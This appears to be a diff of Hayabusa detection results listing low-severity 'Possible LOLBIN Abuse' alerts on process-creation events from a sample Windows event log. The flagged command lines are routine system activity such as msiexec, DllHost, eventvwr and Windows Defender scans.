+2016-09-02 23:46:22.988 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x1780 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 23:46:23.139 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x100 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 23:46:23.201 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x6f8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 23:48:22.957 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x8d0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 00:00:00.476 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x1698 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 00:04:56.561 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" xml | Path: C:\Windows\System32\findstr.exe | PID: 0x16ac | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 00:05:21.063 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" xml | Path: C:\Windows\System32\findstr.exe | PID: 0x994 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 00:12:14.714 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" .\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\eventvwr.exe | PID: 0x13a0 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 00:12:14.738 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /COMPUTER:.\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\mmc.exe | PID: 0x10f4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 00:12:39.238 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6f8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 00:12:39.356 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\511-5-system.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xcb4 | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 00:12:39.409 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14c0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 00:12:39.433 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x62c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 00:12:39.445 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\511-5-system.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1294 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 00:12:39.484 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\511-5-system.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xe34 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 00:14:02.255 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" .\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\eventvwr.exe | PID: 0xe28 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 00:14:02.270 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /COMPUTER:.\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\mmc.exe | PID: 0x3c4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 00:53:11.002 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x6f0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 01:40:58.690 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc4c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 01:41:25.835 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x298 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 03:18:00.297 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\powershell5.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xcac | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 03:18:00.345 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1084 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 03:18:00.364 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3b4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 03:18:00.383 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\powershell5.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x5a0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 03:18:00.420 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\powershell5.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x11f4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 04:22:52.366 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14dc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 04:25:19.159 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x140 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 04:25:27.075 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13d0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 06:16:47.905 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13a8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 06:24:11.171 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x15a8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 06:24:11.188 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1128 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:42:26.898 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x1570 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:42:26.947 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x568 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:42:27.427 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xc00 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:42:27.571 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x13b8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:42:27.649 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x738 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:42:47.904 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x12d0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:42:48.029 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 8CC0B2472EAD000E5C8E33E07DDFD7D0 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x690 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:42:49.005 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf6c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:43:24.078 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x11d0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:43:24.155 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 34D9A5A4F5D0DC17DF8EDFC231FC5C94 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1390 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:43:50.397 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xf34 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:43:50.481 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 4E05AD2415D7F17D17A4D032A35E818C E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:43:53.494 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0x1378 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:45:17.009 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x15b0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:45:17.120 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding A8DCAAB671CE24380F54AE29F32412E9 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x145c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:45:55.086 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x14dc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:45:55.181 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 227D6E86271C528C6720A7A85951F549 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1114 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:46:29.971 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x171c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:46:30.076 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 8E27A5AD152700C051A449A753DDD9AD E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1004 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:47:06.223 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x170c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:47:06.332 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding DC56F1E9E9C4D0F4AA05D75E20224E34 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x159c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:47:41.359 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x155c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:47:42.736 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 51E1FCDF5E179FDF27A43218C0B633B2 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1330 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:48:23.665 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1114 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:48:23.826 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 4EC0FCB2436E18C9DDD97D27F3913CDB E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xc30 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:48:46.838 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x6e4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:48:47.001 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding DC5E7443C99933DB3C6E89F5CEB1E97F E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x15b4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
